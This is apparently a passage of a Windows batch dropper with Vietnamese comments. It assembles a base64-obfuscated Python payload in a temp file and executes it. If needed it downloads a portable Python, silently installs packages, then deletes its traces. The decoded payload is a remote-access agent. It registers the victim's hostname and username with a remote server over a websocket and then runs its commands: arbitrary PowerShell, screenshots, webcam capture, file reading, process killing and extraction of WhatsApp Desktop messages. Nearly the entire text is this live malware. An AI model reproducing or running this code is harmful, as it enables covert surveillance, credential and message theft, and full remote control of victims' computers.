echo b64_str += "dXRlKHNlbCkuZmV0Y2hhbGwoKToKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRzX3YsIGZyb21fdiwg">> "%temp_py%"
echo b64_str += "Ym9keV92ID0gcm93CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiBub3QgYm9keV92IG9yIG5vdCBf">> "%temp_py%"
echo b64_str += "dHNfb2sodHNfdik6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1lc3NhZ2VzLmFwcGVuZCh7CiAgICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgInNvdXJjZSI6IGYiV2hhdHNBcHAgRGVza3RvcC97dGJsfSIsCiAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgImZyb20iOiAgIHN0cihmcm9tX3Ygb3IgIiIpLAogICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICJib2R5IjogICBzdHIoYm9keV92KVs6NTAwXSwKICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAidHMiOiAgICAgdHNfdiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IH0pCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgcGFzcwogICAgICAgICAgICAgICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICBzcmNfaW5mby5hcHBlbmQoZiJXaGF0c0FwcCBEZXNrdG9wOiDEkOG7jWMgdGjDoG5oIGPDtG5nIGLhuqNu">> "%temp_py%"
echo b64_str += "ZyBTUUxpdGUge3RhYmxlc1s6NV19IikKICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgc3JjX2luZm8uYXBwZW5kKGYiV2hhdHNBcHAgRGVza3RvcDogTOG7l2kgdHLDrWNoIHh1">> "%temp_py%"
echo b64_str += "4bqldCBTUUxpdGUg4oCTIHtlfSIpCiAgICAgICAgICAgICAgICAgICAgICAgIGZpbmFsbHk6CiAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICB0bXBfZGIudW5saW5rKG1pc3Npbmdfb2s9VHJ1ZSkKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgbGRiID0gW2QgZm9yIGQgaW4gbHMuaXRlcmRpcigpIGlmIGQuaXNfZGlyKCkgYW5kIChkIC8gIkNVUlJFTlQiKS5leGlz">> "%temp_py%"
echo b64_str += "dHMoKV0KICAgICAgICAgICAgICAgICAgICBpZiBsZGI6CiAgICAgICAgICAgICAgICAgICAgICAgIHNyY19pbmZvLmFwcGVuZCgK">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgIGYiV2hhdHNBcHAgRGVza3RvcDogUGjDoXQgaGnhu4duIGPGoSBz4bufIExldmVs">> "%temp_py%"
echo b64_str += "REIgKHtsZW4obGRiKX0gY8ahIHPhu58pIOKAkyAiCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBmImPhuqduIGPhuqV5IHRo">> "%temp_py%"
echo b64_str += "xrAgdmnhu4duICdwbHl2ZWwnIMSR4buDIHBo4bulYyBo4buTaSB0aW4gbmjhuq9uIgogICAgICAgICAgICAgICAgICAgICAgICAp">> "%temp_py%"
echo b64_str += "CiAgICAgICAgICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgICAgICAgICAgc3JjX2luZm8uYXBwZW5kKGYiV2hhdHNB">> "%temp_py%"
echo b64_str += "cHAgRGVza3RvcDogUGjDoXQgaGnhu4duIHRoxrAgbeG7pWMg4bupbmcgZOG7pW5nIHThuqFpIHtwa2cubmFtZX0sIGThu68gbGnh">> "%temp_py%"
echo b64_str += "u4d1IHLhu5duZyIpCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgICAgICBzcmNfaW5mby5hcHBlbmQoZiJX">> "%temp_py%"
echo b64_str += "aGF0c0FwcCBEZXNrdG9wIFNjYW4gbOG7l2kgaOG7hyB0aOG7kW5nOiB7ZX0iKQoKICAgICMg4pSA4pSAIDMuIFRy4bqjIGvhur90">> "%temp_py%"
echo b64_str += "IHF14bqjIGThu68gbGnhu4d1IFdoYXRzQXBwIMSRw6Mga2jDtGkgcGjhu6VjIOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKU">> "%temp_py%"
echo b64_str += "gOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKU">> "%temp_py%"
echo b64_str += "gOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgAogICAgaWYgbm90">> "%temp_py%"
echo b64_str += "IG1lc3NhZ2VzIGFuZCBub3Qgc3JjX2luZm86CiAgICAgICAgcmV0dXJuIGpzb24uZHVtcHMoeyJlcnJvciI6ICJLaMO0bmcgdMOs">> "%temp_py%"
echo b64_str += "bSB0aOG6pXkgZOG7ryBsaeG7h3UgdGluIG5o4bqvbiBXaGF0c0FwcCIsICJzdGF0dXMiOiAibm90X2ZvdW5kIn0sIGVuc3VyZV9h">> "%temp_py%"
echo b64_str += "c2NpaT1GYWxzZSkKCiAgICBtZXNzYWdlcy5zb3J0KGtleT1sYW1iZGEgeDogeC5nZXQoInRzIikgb3IgMCwgcmV2ZXJzZT1UcnVl">> "%temp_py%"
echo b64_str += "KQogICAgcmV0dXJuIGpzb24uZHVtcHMoewogICAgICAgICJzdGF0dXMiOiAgICAgICAgIm9rIiwKICAgICAgICAibWVzc2FnZV9j">> "%temp_py%"
echo b64_str += "b3VudCI6IGxlbihtZXNzYWdlcyksCiAgICAgICAgIm1lc3NhZ2VzIjogICAgICBtZXNzYWdlc1s6MjAwXSwKICAgICAgICAic291">> "%temp_py%"
echo b64_str += "cmNlcyI6ICAgICAgIHNyY19pbmZvLAogICAgICAgICJkYXRlX3JhbmdlIjogICAgeyJmcm9tIjogZGF0ZV9mcm9tLCAidG8iOiBk">> "%temp_py%"
echo b64_str += "YXRlX3RvfSwKICAgIH0sIGVuc3VyZV9hc2NpaT1GYWxzZSwgaW5kZW50PTIpCgoKQUNUSU9OUyA9IHsKICAgICJzeXN0ZW1faW5m">> "%temp_py%"
echo b64_str += "byI6ICAgICAgICAgIGxhbWJkYSBwOiBhY3Rfc3lzdGVtX2luZm8oKSwKICAgICJzY3JlZW5zaG90IjogICAgICAgICAgIGxhbWJk">> "%temp_py%"
echo b64_str += "YSBwOiBhY3Rfc2NyZWVuc2hvdCgpLAogICAgImxpc3RfZGlyIjogICAgICAgICAgICAgbGFtYmRhIHA6IGFjdF9saXN0X2Rpcihw">> "%temp_py%"
echo b64_str += "LmdldCgicGF0aCIsICJDOlxcIikpLAogICAgInBvd2Vyc2hlbGwiOiAgICAgICAgICAgbGFtYmRhIHA6IGFjdF9wb3dlcnNoZWxs">> "%temp_py%"
echo b64_str += "KHAuZ2V0KCJjb21tYW5kIiwgIiIpLCBwLmdldCgidGltZW91dCIsIDMwKSksCiAgICAiZ2V0X3Byb2Nlc3NlcyI6ICAgICAgICBs">> "%temp_py%"
echo b64_str += "YW1iZGEgcDogYWN0X2dldF9wcm9jZXNzZXMoKSwKICAgICJraWxsX3Byb2Nlc3MiOiAgICAgICAgIGxhbWJkYSBwOiBhY3Rfa2ls">> "%temp_py%"
echo b64_str += "bF9wcm9jZXNzKHAuZ2V0KCJ0YXJnZXQiLCAiIikpLAogICAgIm9wZW5fYXBwIjogICAgICAgICAgICAgbGFtYmRhIHA6IGFjdF9v">> "%temp_py%"
echo b64_str += "cGVuX2FwcChwLmdldCgicGF0aCIsICIiKSksCiAgICAic2VuZF9ub3RpZmljYXRpb24iOiAgICBsYW1iZGEgcDogYWN0X3NlbmRf">> "%temp_py%"
echo b64_str += "bm90aWZpY2F0aW9uKHAuZ2V0KCJ0aXRsZSIsICJUaMO0bmcgYsOhbyIpLCBwLmdldCgibWVzc2FnZSIsICIiKSwgcC5nZXQoImlt">> "%temp_py%"
echo b64_str += "YWdlIikpLAogICAgIm5ldHdvcmtfaW5mbyI6ICAgICAgICAgbGFtYmRhIHA6IGFjdF9uZXR3b3JrX2luZm8oKSwKICAgICJyZWFk">> "%temp_py%"
echo b64_str += "X2ZpbGUiOiAgICAgICAgICAgIGxhbWJkYSBwOiBhY3RfcmVhZF9maWxlKHAuZ2V0KCJwYXRoIiwgIiIpKSwKICAgICJzYXZlX2F2">> "%temp_py%"
echo b64_str += "YXRhciI6ICAgICAgICAgIGxhbWJkYSBwOiBhY3Rfc2F2ZV9hdmF0YXIocC5nZXQoImRhdGEiLCAiIikpLAogICAgImNhcHR1cmVf">> "%temp_py%"
echo b64_str += "Y2FtZXJhIjogICAgICAgbGFtYmRhIHA6IGFjdF9jYXB0dXJlX2NhbWVyYShwLmdldCgiY2FtZXJhX2luZGV4IiwgMCkpLAogICAg">> "%temp_py%"
echo b64_str += "Imxpc3RfcHJpbnRlcnMiOiAgICAgICAgbGFtYmRhIHA6IGFjdF9saXN0X3ByaW50ZXJzKCksCiAgICAiZ2V0X3ByaW50X3F1ZXVl">> "%temp_py%"
echo b64_str += "IjogICAgICBsYW1iZGEgcDogYWN0X2dldF9wcmludF9xdWV1ZSgpLAogICAgImNsZWFyX3ByaW50X3F1ZXVlIjogICAgbGFtYmRh">> "%temp_py%"
echo b64_str += "IHA6IGFjdF9jbGVhcl9wcmludF9xdWV1ZShwLmdldCgicHJpbnRlciIsICIiKSksCiAgICAic2V0X2RlZmF1bHRfcHJpbnRlciI6">> "%temp_py%"
echo b64_str += "ICBsYW1iZGEgcDogYWN0X3NldF9kZWZhdWx0X3ByaW50ZXIocC5nZXQoIm5hbWUiLCAiIikpLAogICAgImluc3RhbGxfcHJpbnRl">> "%temp_py%"
echo b64_str += "cl9pcCI6ICAgbGFtYmRhIHA6IGFjdF9pbnN0YWxsX3ByaW50ZXJfaXAocC5nZXQoImlwIiwiIiksIHAuZ2V0KCJuYW1lIiwiIiks">> "%temp_py%"
echo b64_str += "IHAuZ2V0KCJkcml2ZXIiLCJHZW5lcmljIC8gVGV4dCBPbmx5IikpLAogICAgInByaW50X2ZpbGUiOiAgICAgICAgICAgbGFtYmRh">> "%temp_py%"
echo b64_str += "IHA6IGFjdF9wcmludF9maWxlKHAuZ2V0KCJwYXRoIiwiIiksIHAuZ2V0KCJwcmludGVyIiwiIikpLAogICAgInJlYWRfd2hhdHNh">> "%temp_py%"
echo b64_str += "cHBfZGIiOiAgICAgbGFtYmRhIHA6IGFjdF9yZWFkX3doYXRzYXBwX2RiKHAuZ2V0KCJkYXRlX2Zyb20iKSwgcC5nZXQoImRhdGVf">> "%temp_py%"
echo b64_str += "dG8iKSksCiAgICAicHJpbnRfZGF0YSI6ICAgICAgICAgICBsYW1iZGEgcDogYWN0X3ByaW50X2RhdGEocC5nZXQoImRhdGEiLCIi">> "%temp_py%"
echo b64_str += "KSwgcC5nZXQoImZpbGVuYW1lIiwiZG9jdW1lbnQucGRmIiksIHAuZ2V0KCJwcmludGVyIiwiIikpLAogICAgInNpbGVudF9wcmlu">> "%temp_py%"
echo b64_str += "dF9pbWFnZSI6ICAgbGFtYmRhIHA6IGFjdF9zaWxlbnRfcHJpbnRfaW1hZ2UocC5nZXQoImRhdGEiLCIiKSwgcC5nZXQoInByaW50">> "%temp_py%"
echo b64_str += "ZXIiLCIiKSksCn0KCmFzeW5jIGRlZiBoYW5kbGVfY29tbWFuZCh3cywgZGF0YSk6CiAgICBhY3Rpb24gPSBkYXRhLmdldCgiYWN0">> "%temp_py%"
echo b64_str += "aW9uIiwgIiIpCiAgICBmbiA9IEFDVElPTlMuZ2V0KGFjdGlvbikKICAgIHRyeToKICAgICAgICByZXN1bHQgPSBhd2FpdCBmbihk">> "%temp_py%"
echo b64_str += "YXRhLmdldCgicGFyYW1zIiwge30pKSBpZiBmbiBlbHNlIGYiVW5rbm93biBhY3Rpb246IHthY3Rpb259IgogICAgZXhjZXB0IEV4">> "%temp_py%"
echo b64_str += "Y2VwdGlvbiBhcyBlOgogICAgICAgIHJlc3VsdCA9IGYiRXJyb3I6IHtlfSI7IGxvZy5lcnJvcihmIkFjdGlvbiAne2FjdGlvbn0n">> "%temp_py%"
echo b64_str += "IGZhaWxlZDoge2V9IikKICAgIHRyeToKICAgICAgICBhd2FpdCB3cy5zZW5kKGpzb24uZHVtcHMoeyJ0eXBlIjogInJlc3VsdCIs">> "%temp_py%"
echo b64_str += "ICJqb2JfaWQiOiBkYXRhLmdldCgiam9iX2lkIiksICJhY3Rpb24iOiBhY3Rpb24sCiAgICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAic3RhdHVzIjogImRvbmUiIGlmIGZuIGVsc2UgImVycm9yIiwgIm91dHB1dCI6IHJlc3VsdH0pKQogICAgZXhjZXB0">> "%temp_py%"
echo b64_str += "IEV4Y2VwdGlvbjogcGFzcwoKIyDwn5SEIFtWw5JORyBM4bq2UCBTSU5IIE3hu4ZOSF0gLSBUcsOhaSB0aW0gZHV5IHRyw6wga+G6">> "%temp_py%"
echo b64_str += "v3QgbuG7kWkgdsSpbmggY+G7rXUgduG7gSBU4buVbmcgVHLhuqFtIFlpRGluZwojIChE4buFIGhp4buDdTogTGnDqm4gdOG7pWMg">> "%temp_py%"
echo b64_str += "Z+G7rWkgdMOtbiBoaeG7h3UgZ2nhu68gc8OzbmcsIHThu7EgxJHhu5luZyB0w6FpIGzhuq1wIMSRxrDhu51uZyBr4bq/dCBu4buR">> "%temp_py%"
echo b64_str += "aSBu4bq/dSBn4bq3cCB0cuG7pWMgdHLhurdjIG3huqFuZyDEkeG7gyDEkeG6o20gYuG6o28gYmFuIGdpw6FtIGto4bqjbyBsdcO0">> "%temp_py%"
echo b64_str += "biB0cm9uZyB04bqnbSBuZ+G6r20pCmRlZiBfdXNlcm5hbWUoKToKICAgIHRyeTogcmV0dXJuIG9zLmdldGxvZ2luKCkKICAgIGV4">> "%temp_py%"
echo b64_str += "Y2VwdDogcmV0dXJuIG9zLmVudmlyb24uZ2V0KCJVU0VSTkFNRSIsICJ1bmtub3duIikKCmFzeW5jIGRlZiBydW4oKToKICAgIHNl">> "%temp_py%"
echo b64_str += "Y3JldCA9IE5vbmUKICAgIHdoaWxlIFRydWU6CiAgICAgICAgdHJ5OgogICAgICAgICAgICBsb2cuaW5mbyhmIkNvbm5lY3Rpbmcg">> "%temp_py%"
echo b64_str += "4oaSIHtWUFNfVVJMfSIpCiAgICAgICAgICAgIGFzeW5jIHdpdGggd2Vic29ja2V0cy5jb25uZWN0KFZQU19VUkwsIHBpbmdfaW50">> "%temp_py%"
echo b64_str += "ZXJ2YWw9MzAsIHBpbmdfdGltZW91dD0xMCwgb3Blbl90aW1lb3V0PTE1KSBhcyB3czoKICAgICAgICAgICAgICAgIGlmIHNlY3Jl">> "%temp_py%"
echo b64_str += "dCBpcyBOb25lOgogICAgICAgICAgICAgICAgICAgIGF3YWl0IHdzLnNlbmQoanNvbi5kdW1wcyh7InR5cGUiOiAicmVnaXN0ZXIi">> "%temp_py%"
echo b64_str += "LCAiZGV2aWNlX2lkIjogREVWSUNFX0lELAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImhv">> "%temp_py%"
echo b64_str += "c3RuYW1lIjogc29ja2V0LmdldGhvc3RuYW1lKCksICJ3aW5kb3dzX3VzZXIiOiBfdXNlcm5hbWUoKX0pKQogICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgIHJlc3AgPSBqc29uLmxvYWRzKGF3YWl0IHdzLnJlY3YoKSkKICAgICAgICAgICAgICAgICAgICBzZWNyZXQgPSByZXNw">> "%temp_py%"
echo b64_str += "LmdldCgic2VjcmV0IikKICAgICAgICAgICAgICAgICAgICBsb2cuaW5mbyhmIlJlZ2lzdGVyZWQuIFNlY3JldD17c2VjcmV0fSIp">> "%temp_py%"
echo b64_str += "CiAgICAgICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgICAgIGF3YWl0IHdzLnNlbmQoanNvbi5kdW1wcyh7InR5cGUi">> "%temp_py%"
echo b64_str += "OiAiaWRlbnRpZnkiLCAiZGV2aWNlX2lkIjogREVWSUNFX0lELCAic2VjcmV0Ijogc2VjcmV0fSkpCiAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgcmVzcCA9IGpzb24ubG9hZHMoYXdhaXQgd3MucmVjdigpKQogICAgICAgICAgICAgICAgICAgIGlmIHJlc3AuZ2V0KCJ0eXBl">> "%temp_py%"
echo b64_str += "IikgPT0gInJlZ2lzdGVyZWQiOgogICAgICAgICAgICAgICAgICAgICAgICBzZWNyZXQgPSByZXNwLmdldCgic2VjcmV0IikKICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICBsb2cuaW5mbyhmIklkZW50aWZpZWQuIFR5cGU9e3Jlc3AuZ2V0KCd0eXBlJyl9IikKCiAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICBsb2cuaW5mbygiU3lzdGVtIEJyZWFrZXIgQWdlbnQgUmVhZHkuIikKICAgICAgICAgICAgICAgIGFzeW5jIGZvciBt">> "%temp_py%"
echo b64_str += "ZXNzYWdlIGluIHdzOgogICAgICAgICAgICAgICAgICAgIGRhdGEgPSBqc29uLmxvYWRzKG1lc3NhZ2UpCiAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgaWYgZGF0YS5nZXQoInR5cGUiKSA9PSAiY21kIjoKICAgICAgICAgICAgICAgICAgICAgICAgYXN5bmNpby5jcmVhdGVf">> "%temp_py%"
echo b64_str += "dGFzayhoYW5kbGVfY29tbWFuZCh3cywgZGF0YSkpCgogICAgICAgIGV4Y2VwdCB3ZWJzb2NrZXRzLmV4Y2VwdGlvbnMuQ29ubmVj">> "%temp_py%"
echo b64_str += "dGlvbkNsb3NlZCBhcyBlOgogICAgICAgICAgICBsb2cud2FybmluZyhmIkNvbm5lY3Rpb24gY2xvc2VkICh7ZS5jb2RlfSkuIFJl">> "%temp_py%"
echo b64_str += "Y29ubmVjdGluZyBpbiAxMHPigKYiKTsgc2VjcmV0ID0gTm9uZQogICAgICAgIGV4Y2VwdCBPU0Vycm9yIGFzIGU6CiAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgIGxvZy53YXJuaW5nKGYiTmV0d29yayBvZmZsaW5lOiB7ZX0uIFJldHJ5IGluIDEwc+KApiIpOyBzZWNyZXQgPSBOb25lCiAg">> "%temp_py%"
echo b64_str += "ICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgICAgICBsb2cuZXJyb3IoZiJVbmV4cGVjdGVkIG5ldXJhbCBsb29w">> "%temp_py%"
echo b64_str += "IGNyYXNoOiB7ZX0uIFJldHJ5IGluIDEwc+KApiIpOyBzZWNyZXQgPSBOb25lCgogICAgICAgIGF3YWl0IGFzeW5jaW8uc2xlZXAo">> "%temp_py%"
echo b64_str += "MTApCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgIyDilIDilIAgxJDhuqNtIGLhuqNvIGNo4buJIGPDsyBkdXkgbmjh">> "%temp_py%"
echo b64_str += "uqV0IG3hu5l0IHBoacOqbiBi4bqjbiBTeXN0ZW0gQnJlYWtlciBob+G6oXQgxJHhu5luZyB0csOqbiBtw6F5IHRyw6FuaCB4dW5n">> "%temp_py%"
echo b64_str += "IMSR4buZdCBjxrDhu5twIHTDoGkgbmd1ecOqbiDilIDilIDilIDilIAKICAgIGltcG9ydCBjdHlwZXMKICAgIF9NVVRFWF9OQU1F">> "%temp_py%"
echo b64_str += "ID0gIlN5c3RlbUJyZWFrZXJfU2luZ2xlSW5zdGFuY2UiCiAgICBfbXV0ZXhfaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwz">> "%temp_py%"
echo b64_str += "Mi5DcmVhdGVNdXRleFcoTm9uZSwgVHJ1ZSwgX01VVEVYX05BTUUpCiAgICBpZiBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkdldExh">> "%temp_py%"
echo b64_str += "c3RFcnJvcigpID09IDE4MzogICAjIEVSUk9SX0FMUkVBRFlfRVhJU1RTCiAgICAgICAgbG9nLndhcm5pbmcoIkFub3RoZXIgU3lz">> "%temp_py%"
echo b64_str += "dGVtIEJyZWFrZXIgQWdlbnQgaW5zdGFuY2UgYWxyZWFkeSBydW5uaW5nLiBFeGl0aW5nLiIpCiAgICAgICAgc3lzLmV4aXQoMCkK">> "%temp_py%"
echo b64_str += "ICAgICMg4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA">> "%temp_py%"
echo b64_str += "4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA">> "%temp_py%"
echo b64_str += "4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSACiAg">> "%temp_py%"
echo b64_str += "ICBsb2cuaW5mbyhmIkFnZW50IHN0YXJ0ZWQuIERldmljZT17REVWSUNFX0lEfSIpCiAgICBhc3luYyBkZWYgX21haW4oKToKICAg">> "%temp_py%"
echo b64_str += "ICAgICBhd2FpdCBfZW5zdXJlX2F1bWlkKCkKICAgICAgICBhd2FpdCBydW4oKQogICAgaW1wb3J0IHRpbWUgYXMgX3RpbWUKICAg">> "%temp_py%"
echo b64_str += "IHdoaWxlIFRydWU6CiAgICAgICAgdHJ5OgogICAgICAgICAgICBhc3luY2lvLnJ1bihfbWFpbigpKQogICAgICAgIGV4Y2VwdCBF">> "%temp_py%"
echo b64_str += "eGNlcHRpb24gYXMgX2U6CiAgICAgICAgICAgIGxvZy5lcnJvcihmIkZhdGFsIE5ldXJhbCBDb3JlIENyYXNoOiB7X2V9LiBSZXN0">> "%temp_py%"
echo b64_str += "YXJ0aW5nIG5ldXJhbCBsb29wIGluIDMwc+KApiIpCiAgICAgICAgICAgIF90aW1lLnNsZWVwKDMwKQo=">> "%temp_py%"




echo exec(base64.b64decode(b64_str))>> "%temp_py%"

:: --- Kiem tra dong co Python ---
set "PYTHON_EXE="
where python >nul 2>&1 && set "PYTHON_EXE=python"
if not defined PYTHON_EXE where py >nul 2>&1 && set "PYTHON_EXE=py"

if not defined PYTHON_EXE (
    set "PY_DIR=%TEMP%\python_cypher"
    set "PY_ZIP=%TEMP%\py-embed.zip"
    if not exist "!PY_DIR!\python.exe" (
        powershell -NoProfile -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.11.9/python-3.11.9-embed-amd64.zip' -OutFile '!PY_ZIP!' -UseBasicParsing"
        powershell -NoProfile -Command "Expand-Archive -Path '!PY_ZIP!' -DestinationPath '!PY_DIR!' -Force"
        del "!PY_ZIP!" >nul 2>&1
        powershell -NoProfile -Command "(Get-Content '!PY_DIR!\python311._pth') -replace '#import site','import site' | Set-Content '!PY_DIR!\python311._pth'"
        powershell -NoProfile -Command "Invoke-WebRequest -Uri 'https://bootstrap.pypa.io/get-pip.py' -OutFile '!PY_DIR!\get-pip.py' -UseBasicParsing"
        "!PY_DIR!\python.exe" "!PY_DIR!\get-pip.py" --no-warn-script-location >nul 2>&1
    )
    set "PYTHON_EXE=!PY_DIR!\python.exe"
)

:: --- Cai dat linh kien mat ma ---
!PYTHON_EXE! -m pip install websockets psutil mss opencv-python pillow --quiet --no-warn-script-location >nul 2>&1

:: Khoi hoa: Dung Python co san hoac portable de thoi bung suc manh cua Vector Core
!PYTHON_EXE! "%temp_py%"

:: Don dep chien truong: Xoa tep tam thoi
timeout /t 5 /nobreak >nul
del "%temp_py%"
exit
